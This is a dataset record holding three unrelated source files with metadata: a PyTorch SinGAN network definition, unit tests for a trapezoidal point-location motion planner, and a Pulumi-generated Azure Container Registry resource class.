| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a6e8f8cd4a51f48f659112062535b3df3951785
| 2,395
|
py
|
Python
|
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | 4
|
2020-05-13T07:50:40.000Z
|
2020-06-15T03:14:12.000Z
|
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | null | null | null |
networks.py
|
MingtaoGuo/SinGAN_Pytorch
|
e27d98a39c1534bee515378523e36a02b366fd72
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
class Generator(nn.Module):
def __init__(self, nums_block):
super(Generator, self).__init__()
self.nums_block = nums_block
self.padding = nn.ZeroPad2d(5)
self.conv1 = nn.Sequential(
nn.Conv2d(3, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv3 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv4 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv5 = nn.Sequential(
nn.Conv2d(nums_block, 3, 3, 1),
nn.Tanh()
)
def forward(self, z, x):
temp = x
x = self.padding(x+z)
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
res = self.conv5(x)
return res + temp
class Discriminator(nn.Module):
def __init__(self, nums_block):
super(Discriminator, self).__init__()
self.nums_block = nums_block
self.conv1 = nn.Sequential(
nn.Conv2d(3, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv3 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv4 = nn.Sequential(
nn.Conv2d(nums_block, nums_block, 3, 1),
nn.BatchNorm2d(nums_block),
nn.LeakyReLU(0.2)
)
self.conv5 = nn.Sequential(
nn.Conv2d(nums_block, 1, 3, 1),
)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.conv5(x)
return x
| 29.9375
| 53
| 0.502296
| 291
| 2,395
| 3.975945
| 0.127148
| 0.233362
| 0.121003
| 0.172861
| 0.821089
| 0.821089
| 0.821089
| 0.821089
| 0.708729
| 0.708729
| 0
| 0.053908
| 0.380376
| 2,395
| 80
| 54
| 29.9375
| 0.725741
| 0
| 0
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a8086c7df9fd661228622dc50e228e4cd47bbcc
| 17,108
|
py
|
Python
|
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
unittests/test_point_location.py
|
argupta98/MotionPlanning
|
1b8454ff2b6fe797773727d8de57999a9fc68c0f
|
[
"MIT"
] | null | null | null |
import unittest
from src.point_location import *
from src.structures import *
from src.graph import *
import numpy as np
from numpy import array
from tqdm import tqdm
class TestTrapezoidRep(unittest.TestCase):
def test_three_init(self):
vertices = np.array([[10, 150], [200, 20], [200, 100]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[10, 150], [200, 100]]))
np.testing.assert_equal(trap.bottom_line, np.array([[10, 150], [200, 20]]))
self.assertEqual(trap.left_p[0], 10)
self.assertEqual(trap.right_p[0], 200)
def test_four_init(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[10, 300], [200, 100]]))
np.testing.assert_equal(trap.bottom_line, np.array([[10, 10], [200, 20]]))
self.assertEqual(trap.left_p[0], 10)
self.assertEqual(trap.right_p[0], 200)
def test_specific_1(self):
vertices = np.array([[240., 300.],
[240., 253.33333333],
[100., 300.]])
trap = Trapezoid(vertices, originator_vertices=[])
self.assertTrue(np.allclose(trap.bottom_line, np.array([[100, 300], [240, 253.33333333333]])))
np.testing.assert_equal(trap.top_line, np.array([[100, 300], [240, 300]]))
self.assertEqual(trap.left_p[0], 100)
self.assertEqual(trap.right_p[0], 240)
def test_specific_2(self):
vertices = np.array([[353., 123.98305085],
[275., 122.],
[275., 790.],
[353., 790.]])
trap = Trapezoid(vertices, originator_vertices=[])
np.testing.assert_equal(trap.top_line, np.array([[275., 790.], [353., 790.]]))
self.assertTrue(np.allclose(trap.bottom_line, np.array([[275., 122.], [353., 123.98305085]])))
self.assertEqual(trap.left_p[0], 275)
self.assertEqual(trap.right_p[0], 353)
def test_is_left_pointed(self):
vertices = np.array([[309., 169.],
[471., 170.71247357],
[471., 69.]])
trap = Trapezoid(vertices, originator_vertices=[])
self.assertTrue(trap.is_left_pointed())
class TestTrapezoidIntersection(unittest.TestCase):
def test_left_corner(self):
vertices = np.array([[10, 150], [200, 60], [200, 10]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[10, 150], [205, 50]])
self.assertTrue(trap.is_intersected(edge))
def test_right_corner(self):
vertices = np.array([[10, 10], [10, 300], [400, 150]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 100], [400, 150]])
self.assertTrue(trap.is_intersected(edge))
def test_left_of_trapezoid(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 100], [100, 25]])
self.assertTrue(trap.is_intersected(edge))
def test_right_of_trapezoid(self):
pass
def test_no_intersect(self):
vertices = np.array([[10, 10], [200, 20], [200, 100], [10, 300]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[0, 20], [10, 40]])
self.assertFalse(trap.is_intersected(edge))
def test_top_tangent(self):
vertices = np.array([[491., 186.],
[237., 179.],
[237., 790.],
[491., 790.]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[237, 179],
[353, 114]])
self.assertFalse(trap.is_intersected(edge))
def test_same_upper_right(self):
vertices = np.array([[295., 138.51724138],
[252., 147.4137931 ],
[252., 50.],
[295. , 60.]])
trap = Trapezoid(vertices, originator_vertices=[])
edge = np.array([[242, 60],
[295, 60]])
self.assertTrue(trap.is_intersected(edge))
class TestTrapezoidsRightAdjacent(unittest.TestCase):
def test_trapezoids_above(self):
pass
def test_trapezoids_below(self):
pass
def test_trapezoids_next_to(self):
pass
def test_failure_case(self):
triangles = [np.array([[249, 111],
[184, 172],
[311, 170]]), np.array([[261, 213],
[386, 198],
[283, 268]])]
top_triangle_edges = np.array([[[184, 172], [371, 170]],
[[184, 172], [249, 111]],
[[249, 111], [371, 170]]])
bottom_triangle_edges = np.array([[[386, 198], [283, 268]],
[[261, 213], [283, 268]],
[[261, 213], [386, 198]]])
polygons = Polygons(triangles)
bounds = [10, 10, 790, 790]
point_locator = PointLocator(bounds)
"""
for edge in np.concatenate([top_triangle_edges, bottom_triangle_edges]):
point_locator.add_line(edge)
"""
point_locator.add_line(top_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 4)
point_locator.add_line(top_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 6)
point_locator.add_line(top_triangle_edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 7)
point_locator.add_line(bottom_triangle_edges[0])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 10)
point_locator.add_line(bottom_triangle_edges[1])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 12)
point_locator.add_line(bottom_triangle_edges[2])
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 2)
print(point_locator.trapezoids.right_adjacent_to(371))
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
self.assertEqual(point_locator.trapezoids.trap_count(), 13)
point_locator.remove_traps_within_polygons(polygons)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(184)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(249)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(261)), 2)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(371)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(283)), 1)
self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(386)), 1)
class TestGraphBuilding(unittest.TestCase):
def test_random(self):
bounds = [10, 10, 790, 790]
for _ in tqdm(range(100)):
random_polygons = Polygons(Polygons.make_random(bounds, 50))
point_locator = PointLocator(bounds)
for edge in random_polygons.random_edge_sampler():
point_locator.add_line(edge)
graph = Graph(point_locator, 10)
class TestIntegration(unittest.TestCase):
    """End-to-end tests of PointLocator's trapezoidal decomposition.

    Each test inserts polygon edges one at a time and checks, after every
    insertion, the number of trapezoids right-adjacent to specific x
    coordinates plus the total trapezoid count.
    """

    def test_twotriangles(self):
        """Insert edges of two disjoint triangles, verifying adjacency after each."""
        bounds = [10, 10, 790, 790]
        point_locator = PointLocator(bounds)
        # self.assertEqual(len(point_locator.trapezoids.trapezoids), 1)
        # Before any edges, the bounding box is a single trapezoid at x=10.
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        top_triangle_edges = [np.array([[200, 100], [240, 30]]),
                              np.array([[200, 100], [280, 100]]),
                              np.array([[280, 100], [240, 30]])]
        bottom_triangle_edges = [np.array([[100, 300], [400, 300]]),
                                 np.array([[100, 300], [400, 200]]),
                                 np.array([[400, 300], [400, 200]])]
        point_locator.add_line(top_triangle_edges[0])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        sorted_traps = point_locator.trapezoids.right_adjacent_to(10)
        # NOTE(review): `.keys()[0]` assumes an indexable keys view (e.g. a
        # sortedcontainers SortedDict), not a plain dict — confirm container type.
        trap_idx = sorted_traps[sorted_traps.keys()[0]].index
        self.assertEqual(len(point_locator.trapezoids.right_adjacent(trap_idx)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 4)
        point_locator.add_line(bottom_triangle_edges[0])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 7)
        point_locator.add_line(bottom_triangle_edges[1])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 8)
        point_locator.add_line(top_triangle_edges[1])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(280)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 10)
        point_locator.add_line(top_triangle_edges[2])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        sorted_traps = point_locator.trapezoids.right_adjacent_to(10)
        trap_idx = sorted_traps[sorted_traps.keys()[0]].index
        self.assertEqual(len(point_locator.trapezoids.right_adjacent(trap_idx)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(200)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(100)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(240)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(280)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(400)), 1)

    def test_specific_3(self):
        """Regression case: a thin triangle with float coordinates."""
        bounds = [10, 10, 790, 790]
        point_locator = PointLocator(bounds)
        edges = [np.array([[100.41771139, 497.65833091],
                           [193.75398968, 339.39024785]]),
                 np.array([[100.41771139, 497.65833091],
                           [168.82113323, 479.70436783]]),
                 np.array([[168.82113323, 479.70436783],
                           [193.75398968, 339.39024785]])]
        point_locator.add_line(edges[0])
        point_locator.add_line(edges[1])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(168.82113323)), 1)
        point_locator.trapezoids.trap_count()
        # self.assertEqual(len(point_locator.trapezoids.right_adjacent(7)), 1)
        point_locator.add_line(edges[2])

    def test_specific_4(self):
        """Regression case: small bounding box; passes if no exception is raised."""
        bounds = [10, 10, 79.0, 79.0]
        point_locator = PointLocator(bounds)
        edges = [np.array([[27.54014023, 50.39508477],
                 [33.87852725, 21.53020476]]), np.array([[16.20062533, 38.51858695],
                 [27.54014023, 50.39508477]]), np.array([[16.20062533, 38.51858695],
                 [33.87852725, 21.53020476]])]
        point_locator.add_line(edges[0])
        point_locator.add_line(edges[1])
        point_locator.trapezoids.trap_count()
        point_locator.add_line(edges[2])

    def test_specific_5(self):
        """Regression case: four edges from two open polylines."""
        bounds = [10, 10, 790, 790]
        edges = [array([[443, 737],
                 [550, 780]]), array([[309, 169],
                 [471, 69]]), array([[309, 169],
                 [782, 174]]), array([[156, 719],
                 [550, 780]])]
        point_locator = PointLocator(bounds)
        point_locator.add_line(edges[0])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
        point_locator.add_line(edges[1])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(309)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(471)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 7)
        point_locator.add_line(edges[2])
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(10)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(309)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(443)), 2)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(471)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(550)), 1)
        self.assertEqual(len(point_locator.trapezoids.right_adjacent_to(782)), 1)
        self.assertEqual(point_locator.trapezoids.trap_count(), 9)
        point_locator.add_line(edges[3])

    def test_random(self):
        """Fuzz: insert all edges of 100 random polygon sets; passes if no exception."""
        bounds = [10, 10, 790, 790]
        for _ in tqdm(range(100)):
            random_polygons = Polygons(Polygons.make_random(bounds, 40))
            point_locator = PointLocator(bounds)
            for edge in random_polygons.random_edge_sampler():
                point_locator.add_line(edge)
| 50.765579
| 102
| 0.645546
| 2,112
| 17,108
| 4.999527
| 0.088542
| 0.151151
| 0.208353
| 0.21735
| 0.843167
| 0.822332
| 0.778293
| 0.752344
| 0.716545
| 0.683587
| 0
| 0.102624
| 0.220248
| 17,108
| 336
| 103
| 50.916667
| 0.688906
| 0.007599
| 0
| 0.556738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.411348
| 1
| 0.078014
| false
| 0.014184
| 0.024823
| 0
| 0.120567
| 0.003546
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce5a4a2c4843bea3ab6496d0c417dbf33ff59ddb
| 12,910
|
py
|
Python
|
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/containerservice/registry.py
|
kenny-wealth/pulumi-azure
|
e57e3a81f95bf622e7429c53f0bff93e33372aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Registry(pulumi.CustomResource):
    # NOTE: generated by the Pulumi Terraform Bridge (tfgen) — structure and
    # docstrings follow the generator's conventions; keep hand edits minimal.
    admin_enabled: pulumi.Output[bool]
    """
    Specifies whether the admin user is enabled. Defaults to `false`.
    """
    admin_password: pulumi.Output[str]
    """
    The Password associated with the Container Registry Admin account - if the admin account is enabled.
    """
    admin_username: pulumi.Output[str]
    """
    The Username associated with the Container Registry Admin account - if the admin account is enabled.
    """
    georeplication_locations: pulumi.Output[list]
    """
    A list of Azure locations where the container registry should be geo-replicated.
    """
    location: pulumi.Output[str]
    """
    Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
    """
    login_server: pulumi.Output[str]
    """
    The URL that can be used to log into the container registry.
    """
    name: pulumi.Output[str]
    """
    Specifies the name of the Container Registry. Changing this forces a new resource to be created.
    """
    network_rule_set: pulumi.Output[dict]
    """
    A `network_rule_set` block as documented below.

      * `defaultAction` (`str`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
      * `ipRules` (`list`) - One or more `ip_rule` blocks as defined below.
        * `action` (`str`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
        * `ipRange` (`str`) - The CIDR block from which requests will match the rule.
      * `virtualNetworks` (`list`) - One or more `virtual_network` blocks as defined below.
        * `action` (`str`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
        * `subnetId` (`str`) - The subnet id from which requests will match the rule.
    """
    resource_group_name: pulumi.Output[str]
    """
    The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
    """
    sku: pulumi.Output[str]
    """
    The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
    """
    storage_account: pulumi.Output[dict]
    admin_password: pulumi.Output[str]
    storage_account_id: pulumi.Output[str]
    """
    The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
    """
    tags: pulumi.Output[dict]
    """
    A mapping of tags to assign to the resource.
    """
    def __init__(__self__, resource_name, opts=None, admin_enabled=None, georeplication_locations=None, location=None, name=None, network_rule_set=None, resource_group_name=None, sku=None, storage_account=None, storage_account_id=None, tags=None, __props__=None, __name__=None, __opts__=None):
        """
        Manages an Azure Container Registry.

        > **Note:** All arguments including the access key will be stored in the raw state as plain-text.
        [Read more about sensitive data in state](https://www.terraform.io/docs/state/sensitive-data.html).

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_enabled: Specifies whether the admin user is enabled. Defaults to `false`.
        :param pulumi.Input[list] georeplication_locations: A list of Azure locations where the container registry should be geo-replicated.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] name: Specifies the name of the Container Registry. Changing this forces a new resource to be created.
        :param pulumi.Input[dict] network_rule_set: A `network_rule_set` block as documented below.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
        :param pulumi.Input[str] sku: The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
        :param pulumi.Input[str] storage_account_id: The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
        :param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.

        The **network_rule_set** object supports the following:

          * `defaultAction` (`pulumi.Input[str]`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
          * `ipRules` (`pulumi.Input[list]`) - One or more `ip_rule` blocks as defined below.
            * `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
            * `ipRange` (`pulumi.Input[str]`) - The CIDR block from which requests will match the rule.
          * `virtualNetworks` (`pulumi.Input[list]`) - One or more `virtual_network` blocks as defined below.
            * `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
            * `subnetId` (`pulumi.Input[str]`) - The subnet id from which requests will match the rule.

        The **storage_account** object supports the following:

          * `accessKey` (`pulumi.Input[str]`)
          * `name` (`pulumi.Input[str]`) - Specifies the name of the Container Registry. Changing this forces a new resource to be created.

        > This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/container_registry.html.markdown.
        """
        # Legacy keyword aliases (__name__/__opts__) are honoured but deprecated.
        if __name__ is not None:
            warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
            resource_name = __name__
        if __opts__ is not None:
            warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
            opts = __opts__
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = utilities.get_version()
        # opts.id set means "adopt existing resource"; __props__ is only valid there.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = dict()

            __props__['admin_enabled'] = admin_enabled
            __props__['georeplication_locations'] = georeplication_locations
            __props__['location'] = location
            __props__['name'] = name
            __props__['network_rule_set'] = network_rule_set
            if resource_group_name is None:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__['resource_group_name'] = resource_group_name
            __props__['sku'] = sku
            __props__['storage_account'] = storage_account
            __props__['storage_account_id'] = storage_account_id
            __props__['tags'] = tags
            # Output-only properties are initialised to None; the provider fills them in.
            __props__['admin_password'] = None
            __props__['admin_username'] = None
            __props__['login_server'] = None
        super(Registry, __self__).__init__(
            'azure:containerservice/registry:Registry',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name, id, opts=None, admin_enabled=None, admin_password=None, admin_username=None, georeplication_locations=None, location=None, login_server=None, name=None, network_rule_set=None, resource_group_name=None, sku=None, storage_account=None, storage_account_id=None, tags=None):
        """
        Get an existing Registry resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param str id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_enabled: Specifies whether the admin user is enabled. Defaults to `false`.
        :param pulumi.Input[str] admin_password: The Password associated with the Container Registry Admin account - if the admin account is enabled.
        :param pulumi.Input[str] admin_username: The Username associated with the Container Registry Admin account - if the admin account is enabled.
        :param pulumi.Input[list] georeplication_locations: A list of Azure locations where the container registry should be geo-replicated.
        :param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        :param pulumi.Input[str] login_server: The URL that can be used to log into the container registry.
        :param pulumi.Input[str] name: Specifies the name of the Container Registry. Changing this forces a new resource to be created.
        :param pulumi.Input[dict] network_rule_set: A `network_rule_set` block as documented below.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
        :param pulumi.Input[str] sku: The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
        :param pulumi.Input[str] storage_account_id: The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
        :param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.

        The **network_rule_set** object supports the following:

          * `defaultAction` (`pulumi.Input[str]`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
          * `ipRules` (`pulumi.Input[list]`) - One or more `ip_rule` blocks as defined below.
            * `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
            * `ipRange` (`pulumi.Input[str]`) - The CIDR block from which requests will match the rule.
          * `virtualNetworks` (`pulumi.Input[list]`) - One or more `virtual_network` blocks as defined below.
            * `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
            * `subnetId` (`pulumi.Input[str]`) - The subnet id from which requests will match the rule.

        The **storage_account** object supports the following:

          * `accessKey` (`pulumi.Input[str]`)
          * `name` (`pulumi.Input[str]`) - Specifies the name of the Container Registry. Changing this forces a new resource to be created.

        > This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/container_registry.html.markdown.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = dict()

        __props__["admin_enabled"] = admin_enabled
        __props__["admin_password"] = admin_password
        __props__["admin_username"] = admin_username
        __props__["georeplication_locations"] = georeplication_locations
        __props__["location"] = location
        __props__["login_server"] = login_server
        __props__["name"] = name
        __props__["network_rule_set"] = network_rule_set
        __props__["resource_group_name"] = resource_group_name
        __props__["sku"] = sku
        __props__["storage_account"] = storage_account
        __props__["storage_account_id"] = storage_account_id
        __props__["tags"] = tags
        return Registry(resource_name, opts=opts, __props__=__props__)

    def translate_output_property(self, prop):
        # Map provider camelCase property names back to Python snake_case.
        return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        # Map Python snake_case property names to provider camelCase.
        return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 60.046512
| 297
| 0.687064
| 1,670
| 12,910
| 5.115569
| 0.140719
| 0.050217
| 0.044247
| 0.028913
| 0.765539
| 0.744235
| 0.726677
| 0.726677
| 0.704905
| 0.683367
| 0
